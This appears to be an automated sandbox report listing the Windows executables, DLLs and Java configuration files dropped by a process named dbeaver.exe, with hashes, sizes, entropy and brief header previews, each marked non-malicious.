      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d.....f...........".........."......$..........@....................................l_....`..........................................(..D....(.......`.......P..D............p..8...@#..p............................#..0............ ...............................text............................... ..`.rdata..z.... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..8....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.926752087614716
      Encrypted:false
      SSDEEP:
      MD5:92FAEF86E855A66D52DB609B1BB2F44B
      SHA1:B087C438724627243027891372F153CC71D31AF7
      SHA-256:DFA86D8E1386A45122E05D04003CB80D61D5937F6454D850DE604A14A5AE38E3
      SHA-512:FA07A9074228B5A6FF5FCEDA73F21AD6ED2C7434B260BC96D94775EF09F7DA657A687EFE015354C961E206D03DCD2A48931A98A1C4854BD24AC7827F447988CA
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d...MXNB..........".........."......$..........@....................................W.....`..........................................(..@....(.......`.......P..D............p..8...@#..p............................#..0............ ...............................text............................... ..`.rdata..r.... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..8....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):244224
      Entropy (8bit):6.299888189063924
      Encrypted:false
      SSDEEP:
      MD5:0222BDE80E3CC7D46ECF1F4184400DC2
      SHA1:8D66865F5729EE637C7D5CC8C68E5B4B55C57192
      SHA-256:A5A144E1005FFCB9938CBDC2A5397E6199FC5B9D362A092FA04E6154D4AF90F5
      SHA-512:8418436B7F717A1251A834701440D16AAE42932106FF06CEDC31258E9188C84A641ABB062F117A0DB563633BAC89530042C6FF08430F5314C461F64BF94A920C
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K8.H*VRH*VRH*VRAR.RX*VR.ZWSJ*VR.BWSJ*VR.ZSSD*VR.ZRS@*VR.ZUSL*VR.[WSM*VRH*WR.*VR.[RSS*VR.[VSI*VR.[.RI*VR.[TSI*VRRichH*VR........................PE..d...:"............" ................4.....................................................`.........................................._.......a..........x.......$'...................'..p...........................`(..0...............@............................text............................... ..`.rdata..............................@..@.data...`O...p...2...V..............@....pdata..$'.......(..................@..@.rsrc...x...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):18432
      Entropy (8bit):5.28960121259874
      Encrypted:false
      SSDEEP:
      MD5:2F4AECF4C6307FEEC2358AE48AAF0BD1
      SHA1:0A1F2001BD4BF294D2B65D2D034EB68968973695
      SHA-256:5852A3DE72822EE4BC8CC05341F7206BD60F6A03046EEFF350DEB8A1AD9B64E6
      SHA-512:1569CB30495457DF6E6D0CD1E1713CF5CA7543E6CDEC82131861C3E7AE16F20D0AACD5559C66BCCAFD035B28F0253C0A9173733C70C63CDA36374E3365DE35C3
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Q......../...................................E...........E......E....E.C...E....Rich..........PE..d....&W..........." .........2............................................................`.........................................P9......DJ.......p.......`..L...............$...@3..p............................3..0............0..0............................text...h........................... ..`.rdata..P....0... ..................@..@.data...H....P.......<..............@....pdata..L....`.......>..............@..@.rsrc........p.......B..............@..@.reloc..$............F..............@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):25088
      Entropy (8bit):5.719994812932807
      Encrypted:false
      SSDEEP:
      MD5:DFD2A59DEDD34A53835A4242EDA24C48
      SHA1:43652368D4709A381F25CD93A325B213DC5CC2A1
      SHA-256:CB2E2870F7D686C2613C0009741A0D610F149BC0F78B7CC0EBCD175702A4B2EA
      SHA-512:69ACEE6F429243B9E9C1E7394C26CD61455047D1BACCA2EA11E9ECDCACDC3CF3BFD6C1D5D0A5CACC8E767C281DF7B7A3180DBD16E44BEB78B87C3ABC828E37BA
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5j.q...q...q...xs..}...{..s....B.p...{..}...{..y...{..r...*c..u....z..t...q...0....z..v....z..p....zz.p....z..p...Richq...........PE..d......9.........." .....0...4.......5....................................................`.........................................PQ......dY..................T...............P....I..p...........................PJ..0............@...............................text..../.......0.................. ..`.rdata...!...@..."...4..............@..@.data........p.......V..............@....pdata..T............X..............@..@.rsrc................\..............@..@.reloc..P............`..............@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):499200
      Entropy (8bit):6.525091325613764
      Encrypted:false
      SSDEEP:
      MD5:30199DA376A11941A122FC57630B137D
      SHA1:C4F55F3122A63AB42CB5C1A99C205EC4A2E910E6
      SHA-256:270BFF3065704BBFFC238366A166970F6D89966E37AF3D9BE4DDAE2F9FF2661A
      SHA-512:43799DBD9348D466BF0CEAC45E87F1ABAB252BCB4F1C8A36F1A6FAF4D20ACF441F1046C956B0CD7FB39E4200B27CD16CAE19B17879A89D3DBE6D83092A9D77CB
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A....s...s...s....E..s.......s..^....s...s..,s.......s.......s.......s.....7s......s...)..s......s..Rich.s..................PE..d.....j..........." ................(.....................................................`.........................................p...$.......d....................................e..p...........................Pf..0............................................text...H........................... ..`.rdata..............................@..@.data...H...........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):590632
      Entropy (8bit):6.463330275333709
      Encrypted:false
      SSDEEP:
      MD5:E74CAF5D94AA08D046A44ED6ED84A3C5
      SHA1:ED9F696FA0902A7C16B257DA9B22FB605B72B12E
      SHA-256:3DEDEF76C87DB736C005D06A8E0D084204B836AF361A6BD2EE4651D9C45675E8
      SHA-512:D3128587BC8D62E4D53F8B5F95EB687BC117A6D5678C08DC6B59B72EA9178A7FD6AE8FAA9094D21977C406739D6C38A440134C1C1F6F9A44809E80D162723254
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......n...*...*...*.....w.(...#...<...*......./.....".................+.....g.+.....+...Rich*...................PE..d...R8.^.........." .....>..........p"....................................................`A........................................ m..h....G..,...............(;......(A......4.......T...............................0............P......Ti..@....................text....=.......>.................. ..`.rdata.......P.......B..............@..@.data....:...`..."...P..............@....pdata..(;.......<...r..............@..@.didat..h...........................@....rsrc...............................@..@.reloc..4...........................@..B................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):86528
      Entropy (8bit):6.114694873054062
      Encrypted:false
      SSDEEP:
      MD5:4AC9EFE8BE1BCC0129544E45A4CF3C12
      SHA1:3E63CA13228E8431948FD32289C516700B825658
      SHA-256:C9695973037D21C04355A8C68BBB2D9C595E84367031A548932FFA21D2ED9361
      SHA-512:D0D62DCA5AA2D95315EF0E1AA5CB15165FD065E321DD274AC8E7D91C806190A9EF3CA53EF98BA81AD642D5045DF9DC12E597ECA004CC6AA3DF67E33D1C6D722C
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5o\0q.2cq.2cq.2cxv.cy.2c.~3bs.2c.~6by.2c.~1br.2c.~7b|.2c..3bu.2c*f4bp.2c*f3bx.2cq.3c..2c..6bg.2c..2bp.2c...cp.2c..0bp.2cRichq.2c........................PE..d................." .........|......d.....................................................`..........................................&..8....A.......p..p....`..........................p...........................P...0....................#..`....................text............................... ..`.rdata...^.......`..................@..@.data........P.......@..............@....pdata.......`.......B..............@..@.rsrc...p....p.......L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):69120
      Entropy (8bit):6.0841513263634805
      Encrypted:false
      SSDEEP:
      MD5:1841B8C82840A9B140B52D414D040424
      SHA1:AC61C72D0EF6A6A12C2DB2AC96E0395A27B42F8B
      SHA-256:F73FF60251090F5F10789C2509CFC8517B384D444D55C11D500ED8A8B578D8B6
      SHA-512:0723B7F5DA06C0BA428ADE8885635A787A224CD7C584621E4A227699BE184B7FA1AFDBD7ACDAA9A5FA7D54680DD669B0413C64FAE3EC301F99871D25320D7AF6
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P.A.../A../A../A...A../A..@../A.*@../A.+@../A.,@../A...@../AO..@../A...A../A..+@../A../@../A...A../A..-@../ARich../A........................PE..d.....C.........." .........~...............................................P............`.........................................`....-..0........0..p.... ...............@..8.......p...........................0...0............................................text.............................. ..`.rdata..._.......`..................@..@.data...............................@....pdata....... ......................@..@.rsrc...p....0......................@..@.reloc..8....@......................@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):14848
      Entropy (8bit):5.043277349660132
      Encrypted:false
      SSDEEP:
      MD5:54211AA385A32DA64F04CB7B7EFA4A7F
      SHA1:5023877FA4E9182A19CCD4FAB2BEBDAF6D89F858
      SHA-256:104D17CAF9CEFCDE5FAECC5837AC18BC477DF34476CFFDE69AC3B62E8A3E3F9C
      SHA-512:DD1DE3A502EAB64AA18DD7DA16790BEDBD25F9FC1250B422C4CACF4C92AD93A2B5A575959553A39C79C53A059DEFBD0BF28A4638ABECA31C5D44757A04C612A5
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y..O...O...O...F`r.K....h..M....h..D....h..G....h..L....i..M....p..J...O........i..N....i..N....i..N....i..N...RichO...........................PE..d....f:w.........." .........$............................................................`..........................................8..<....;.......p..x....`..4...............$...02..p............................2..0............0..p............................text...x........................... ..`.rdata.......0......................@..@.data...8....P......................@....pdata..4....`.......0..............@..@.rsrc...x....p.......4..............@..@.reloc..$............8..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):10240
      Entropy (8bit):4.506240018391908
      Encrypted:false
      SSDEEP:
      MD5:C13A6DA4847FDD057791AC63396834CB
      SHA1:BC17A121B7795BA453DCD76AB8BB2083C004A631
      SHA-256:2C8CFC113DC0AAA4A67217AF7FF2A4432549A79E075244FC6DC4FFAFAAD2AA98
      SHA-512:481581151B550D9AFC555685B950FE28FABBC360CC7E4AE5F3DED3C03F66A9F9777D259BD587773A65AAC8ED0CC7488606FC8AF7897A0AD8EC2F381597A1EC8B
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m..>..>..>..^>..>...?..>...?..>...?..>...?..>...?..>R..?..>..>..>R..?..>R..?..>R.2>..>R..?..>Rich..>................PE..d...IYV..........." ................,........................................p............`.........................................@'..l....'..d....P..p....@...............`.. ...p!..p............................!..0............ ...............................text...X........................... ..`.rdata....... ......................@..@.data........0......................@....pdata.......@....... ..............@..@.rsrc...p....P......."..............@..@.reloc.. ....`.......&..............@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):13312
      Entropy (8bit):4.923690806594478
      Encrypted:false
      SSDEEP:
      MD5:5DEAC2BFFE4E49F873E1086D333D3AF3
      SHA1:57743C211245C870B423AD0E8C7A440163F615C7
      SHA-256:81C99F97E199EAFE02948768C4B2B5A17DBD46E2DE8456D7C5673F4EAC45ACAC
      SHA-512:FB391B68334A78D0ADD23252329DE8525A029549448944636C440BB33646F7274638CF844D57DAF5A80FBAB8F145805E79A837C7C95D21ACC8781F93CC6C0397
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........R...R...R...[.@.^......P.......P......C......[......P......Q...R...e......S......S....,.S......S...RichR...........................PE..d....L............".........."......$..........@.....................................0....`..........................................(..H....(.......`.......P..D............p..8...0#..p............................#..0............ ...............................text............................... ..`.rdata..z.... ......................@..@.data........@.......$..............@....pdata..D....P.......&..............@..@.rsrc........`.......(..............@..@.reloc..8....p.......2..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):12528640
      Entropy (8bit):6.393813784490998
      Encrypted:false
      SSDEEP:
      MD5:A883677CD04A0D185DD21CE82C4DAF07
      SHA1:224D69AE86895B58F55DB8D6E29F6D3DFD9CA9D7
      SHA-256:4FD4B22EEBCC07DFD6BBBE48833C8875DAACA908BCADAB0483CF6FBCB592D7FB
      SHA-512:C95B9FB524BE7C903AAF27621C252F10E5A95D3EAFE3665CD2CEC98F683583D287D6EEC013A04C6A7369E9B8C9F43F1C6A729F3E951187468101AF1AA1BCDCFB
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|)..8H..8H..8H..10d.,H...8..<H....0.<H...8.0H...8..<H...8.*H..c ..5H..8H...I...9..L...9..9H...9..9H..8H`.9H...9..9H..Rich8H..........PE..d....i.6.........." .........@;.....0........................................p............`.........................................p..@e...=..|.......8.......\U...............Z..0\..p....................]..(....\..0............................................text............................... ..`.rdata...K&......L&.................@..@.data...0;...`...(...L..............@....pdata..\U.......V...t..............@..@.rsrc...8..........................@..@.reloc...Z.......\.................@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):207872
      Entropy (8bit):6.589928602995542
      Encrypted:false
      SSDEEP:
      MD5:27D5FB9239E9125F0B7B00BDEE2EBBE0
      SHA1:899CC162723FFFC588AF00E39C51385AB694EE8D
      SHA-256:704FD04511AA4DB759383F8E40529F39BEE210E8A345118D0CCF90F18F9F8FCE
      SHA-512:06DDB835D63827A71279B39C3E6D37DCFCA05C17AF7637E9AE4BCAAC829317CA34023BA9A00DFF0F4D457EFB40A585198A8DCA8DA0A44AB3BB99F3B78930D139
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........l....M...M...M..M...Mk..L...M...M...Mk..L...Mk..L...M$..L...Mk..L...M...L...M...M...M$..L...M$..L..M$..L...M$..M...M$..L...MRich...M........PE..d...-.T..........." .....T...........X....................................................`..................................................................p......................p...p...........................0...0............p......t...@....................text...(R.......T.................. ..`.rdata.......p.......X..............@..@.data....5...0......................@....pdata.......p......................@..@.rsrc................&..............@..@.reloc...............*..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):34304
      Entropy (8bit):5.66760554329456
      Encrypted:false
      SSDEEP:
      MD5:45BE234AD506017712BCF0B5F415C8B1
      SHA1:C763D10766E56C9C91CF7B5BE94B0D232884CA8F
      SHA-256:836B9342A9197C33319C2DEC4DB0112D8F77A2D17D5B3E196F69225F7914D5A8
      SHA-512:3B059BBF216C165490E13F5322103B28B281E4892C439BEF97D8C46AF7A4227A88E040043D7EB36D848B1671741A8C729E331F8963A0095825AC2D76B3F1A5D1
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........a..2..2..2...2..2+..3..2+..3..2+..3..2...3..2..2...2+..3..2d.3..2d.3..2d.p2..2d.3..2Rich..2........................PE..d................." .....J...>.......L....................................................`..........................................|..`.......................,...............`....p..p...........................@q..0............`..`............................text...6H.......J.................. ..`.rdata..<)...`...*...N..............@..@.data...@............x..............@....pdata..,............z..............@..@.rsrc...............................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):36864
      Entropy (8bit):5.704716861592171
      Encrypted:false
      SSDEEP:
      MD5:7FE2A2269D9B1E2E2168AB78A41995AF
      SHA1:331D46F2DE2D1AFB7E9B072351F55FED8E1CEEF3
      SHA-256:1DCB76C5D6E24B685976782CD9C86AE32DB2E51F55280CB35E8065087FE2E47E
      SHA-512:FED6D9EE91EBFD66210A1A559C6CDFC201D859FA6D91B74E8936E9EA8B78EA5EDD731B46AEBF77E7963161C31464D81EF1BFDB427F0A3F6AB5DC2D2DF82D30A2
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........>.]._o.._o.._o..'..._o.k/n.._o.k/k.._o.k/l.._o.k/j.._o..7n.._o.._n.._o.$.j.._o.$.o.._o.$...._o.$.m.._o.Rich._o.........PE..d....1r..........." .....R...@.......O....................................................`............................................. .......................(...............L....z..p...........................0{..0............p...............................text....Q.......R.................. ..`.rdata...+...p...,...V..............@..@.data...............................@....pdata..(...........................@..@.rsrc...............................@..@.reloc..L...........................@..B........................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):1016584
      Entropy (8bit):6.669319438805479
      Encrypted:false
      SSDEEP:
      MD5:0E0BAC3D1DCC1833EAE4E3E4CF83C4EF
      SHA1:4189F4459C54E69C6D3155A82524BDA7549A75A6
      SHA-256:8A91052EF261B5FBF3223AE9CE789AF73DFE1E9B0BA5BDBC4D564870A24F2BAE
      SHA-512:A45946E3971816F66DD7EA3788AACC384A9E95011500B458212DC104741315B85659E0D56A41570731D338BDF182141C093D3CED222C007038583CEB808E26FD
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........W..l9F.l9F.l9F...F.l9F.l8F.l9F...F.l9F..9G.l9F..:G.l9F..<G.l9F..7G.n9F..=G.l9F...F.l9F..;G.l9FRich.l9F........PE..d.....}X.........." .........`............................................................`A................................................p......................F...=......p...PX..T............................'...............O...............................text............................... ..`.rdata..<u.......v..................@..@.data....$...........r..............@....pdata.............................@..@.rsrc................4..............@..@.reloc..p............:..............@..B................................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):101672
      Entropy (8bit):6.566355945650465
      Encrypted:false
      SSDEEP:
      MD5:8697C106593E93C11ADC34FAA483C4A0
      SHA1:CD080C51A97AA288CE6394D6C029C06CCB783790
      SHA-256:FF43E813785EE948A937B642B03050BB4B1C6A5E23049646B891A66F65D4C833
      SHA-512:724BBED7CE6F7506E5D0B43399FB3861DDA6457A2AD2FAFE734F8921C9A4393B480CDD8A435DBDBD188B90236CB98583D5D005E24FA80B5A0622A6322E6F3987
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!/.NeNl.eNl.eNl....gNl.l6..nNl.eNm.INl..>o.hNl..>h.uNl..>i.zNl..>l.dNl..>..dNl..>n.dNl.RicheNl.................PE..d...M8.^.........." .........^...... .....................................................`A........................................`1..4....9.......p.......P.......L..(A..........H...T...............................0............................................text...b........................... ..`.rdata...?.......@..................@..@.data...0....@.......4..............@....pdata.......P.......8..............@..@_RDATA.......`.......D..............@..@.rsrc........p.......F..............@..@.reloc...............J..............@..B........................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
      Category:dropped
      Size (bytes):44328
      Entropy (8bit):6.631745572973897
      Encrypted:false
      SSDEEP:
      MD5:21AE0D0CFE9AB13F266AD7CD683296BE
      SHA1:F13878738F2932C56E07AA3C6325E4E19D64AE9F
      SHA-256:7B8F70DD3BDAE110E61823D1CA6FD8955A5617119F5405CDD6B14CAD3656DFC7
      SHA-512:6B2C7CE0FE32FAFFB68510BF8AE1B61AF79B2D8A2D1B633CEBA3A8E6A668A4F5179BB836C550ECAC495B0FC413DF5FE706CD6F42E93EB082A6C68E770339A77C
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h..j...j...j....l.h....y..h...cq..a...j...[....y..o....y..m....y..p....y..k....y|.k....y..k...Richj...................PE..d...Q8.^.........." .....:...4......pA....................................................`A........................................Pk.......k..x....................l..(A......8...(b..T............................b..0............P..X............................text....9.......:.................. ..`.rdata... ...P..."...>..............@..@.data................`..............@....pdata...............b..............@..@.rsrc................f..............@..@.reloc..8............j..............@..B........................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):43520
      Entropy (8bit):6.070929489783732
      Encrypted:false
      SSDEEP:
      MD5:95D08E28A92B598845F81F41E5C35D3F
      SHA1:B6491B00D41A7EB4FC18D3693AEBACCB7D03878C
      SHA-256:5E657CB4C79F28C9B07358FF172B11D423F55AB49315D159BC39BD620AFAE17D
      SHA-512:B9AC4FC957A035419D37168BA8C3551583193F2A39DA8B593E5F576F034E75B9135AC3D54D4901A0B6A667E13B1BE7A8B7837A08BD44559E0D2599D1F2DE4455
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......fY.m"8.>"8.>"8.>+@f>$8.>.H.? 8.>yP.? 8.>..2>#8.>.H.?)8.>.H.?*8.>.H.?!8.>.I.?!8.>"8.>l8.>.I.?#8.>.I.?#8.>.I.>#8.>.I.?#8.>Rich"8.>................PE..d................." .....d...H.......j....................................................`.........................................@...X..............................................p...........................`...0...............`............................text....c.......d.................. ..`.rdata..d2.......4...h..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):20992
      Entropy (8bit):5.381342880132859
      Encrypted:false
      SSDEEP:
      MD5:220BF76FCA11DA750FEB8B834E1A4FE2
      SHA1:E7EF1257FB07E7ADC7538B3260101611A6952C2D
      SHA-256:3DE216C6BCD4F552EEDA77B8339711FE58B83E080DDB97BF82F2A2B2D016E480
      SHA-512:190C60CD0A2799848390977C005D5E3CF0CF543C58165903CDFC148900FFCF00F7C51008233FD5F77F93E6CA51BBFCC5537CE0924197193C80A1E6F5604E9C2B
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@..a...a...a.......a..J./..a..J.+..a..J.*..a..J.-..a..../..a...a/..a....*..a.......a.......a....,..a..Rich.a..........PE..d................." .....$...2.......(....................................................`.........................................@T......(U...............p..................$...0M..p............................M..0............@...............................text....".......$.................. ..`.rdata.."....@.......(..............@..@.data........`.......F..............@....pdata.......p.......H..............@..@.rsrc................L..............@..@.reloc..$............P..............@..B........................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):61952
      Entropy (8bit):6.0126202684690915
      Encrypted:false
      SSDEEP:
      MD5:27DF22DD56DC46EBB8BC07C0335832E3
      SHA1:72E5812191DEDB7D16BFC3A77B4655A741C82E62
      SHA-256:4CF01FAB9713E4FE22B6089122E42DC70662CFBB65520B48211E2A5E59D3DA88
      SHA-512:75BD176E40997BEDC92D2704A29BD51563C15584E7CDDEE85660A04185F8073471268173158800828B6624E220059297141BD25EE9CB69415F940CD5409A86BA
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................$.....@......@......@......@.....................................H............Rich............PE..d....>s@.........." .....x...|.......z.......................................0............`.............................................D...............h.................... ..T...0...p...............................0...............(............................text...(v.......x.................. ..`.rdata..<].......^...|..............@..@.data... ...........................@....pdata..............................@..@.rsrc...h...........................@..@.reloc..T.... ......................@..B........................................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
      Category:dropped
      Size (bytes):76288
      Entropy (8bit):6.512119577079824
      Encrypted:false
      SSDEEP:
      MD5:A7AC7EC4E7DE44B71B71064336B2F7A2
      SHA1:F5C37F5529F6E2F6A28B8EC6B3D0AB2EEB6859D3
      SHA-256:60DC365556CF214229B9E15C35419D3673236BC1856CF9B4D4B87A26C0ACF009
      SHA-512:5C5AB6636D71DB2BF9603F1B6831D3B94B69E4F1C228D904679611C6B49A63BD5C7287153232DE404821B5E02EE167344957F89AD313CEB5BB2C7DA11B1DC254
      Malicious:false
      Reputation:unknown
      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.o.)..})..})..} .}#..}...|+..}r..|+..}.*.},..}...|"..}...|!..}...|-..}...|,..})..}c..}...|=..}...|(..}...}(..}...|(..}Rich)..}................PE..d...p............" .........x...........................................................`..........................................#..\....*.......`..p....P...............p..h.......p........................... ...0............................................text............................... ..`.rdata...a.......b..................@..@.data...x....@......................@....pdata.......P......................@..@.rsrc...p....`.......$..............@..@.reloc..h....p.......(..............@..B................................................................................................................................................................................................................................
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2732
      Entropy (8bit):4.543704203888891
      Encrypted:false
      SSDEEP:
      MD5:0F00EC3E7A7767A4EFEAE1875FB5F3D4
      SHA1:167808418571E9209B952188DDAB2F4E62920E68
      SHA-256:B62D2733AB99556B108A1951D894C5A8D76B1AC7A00C02C388F9EB9BE046C56F
      SHA-512:E869F4A3B821A9933796DC9A56EE00483493369DFBFE07B3B1D895CB8318C6821CD44134EB37513F15B830C25861B596646824ED56672D08B678FEFE6A4C7504
      Malicious:false
      Reputation:unknown
      Preview:############################################################.# .Default Logging Configuration File.#.# You can use a different file by specifying a filename.# with the java.util.logging.config.file system property..# For example, java -Djava.util.logging.config.file=myfile.############################################################..############################################################.# .Global properties.############################################################..# "handlers" specifies a comma-separated list of log Handler.# classes. These handlers will be installed during VM startup..# Note that these classes must be on the system classpath..# By default we only configure a ConsoleHandler, which will only.# show messages at the INFO and above levels..handlers= java.util.logging.ConsoleHandler..# To also add the FileHandler, use the following line instead..#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler..# Default global logging level..# This s
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):6671
      Entropy (8bit):4.786259481951573
      Encrypted:false
      SSDEEP:
      MD5:385443B7E4A37BC277C018CD1D336D49
      SHA1:B2C0DFB00BF699E817BDD49B14BC24B8D3282C65
      SHA-256:5BC726671936E0AF4FDF6BED67D9E3A20A92C30B0BA23673D0314BAA5E3FFB08
      SHA-512:260AFC7671A1DC0C443564F1D10386F0B241BB53C76DF68D8D03F1D0B1CEAF3F68847AB3477732C876C2B01C812EF7521744BEFE88E312F3AA63164B608B67A1
      Malicious:false
      Reputation:unknown
      Preview:############################################################.# Default Networking Configuration File.#.# This file may contain default values for the networking system properties..# These values are only used when the system properties are not specified.# on the command line or set programmatically..# For now, only the various proxy settings can be configured here..############################################################..# Whether or not the DefaultProxySelector will default to System Proxy.# settings when they do exist..# Set it to 'true' to enable this feature and check for platform.# specific proxy settings.# Note that the system properties that do explicitly set proxies.# (like http.proxyHost) do take precedence over the system settings.# even if java.net.useSystemProxies is set to true...java.net.useSystemProxies=false..#------------------------------------------------------------------------.# Proxy configuration for the various protocol handlers..# DO NOT uncomment th
      Process:C:\ProgramData\jvb\dbeaver.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):2180
      Entropy (8bit):4.44345130079058
      Encrypted:false
      SSDEEP:
      MD5:FBF2B55342947695AA2A15E3485ED29F
      SHA1:A04C23F61D2958FC1E9882509927B43CAB0E799C
      SHA-256:F2A00A1DEC3B7A097F0815F338A84717BA1017D5D7AAE96D842D2188D67C3250
      SHA-512:35FFE47EB7D404785E5BEF3F1F26629F5DC04C54F9DCB082A250DA367414095B024E6486AD0332CEBE0348A2F972E9D58979C8C86AB9753F72FF0727BDA07C1C
      Malicious:false
      Reputation:unknown
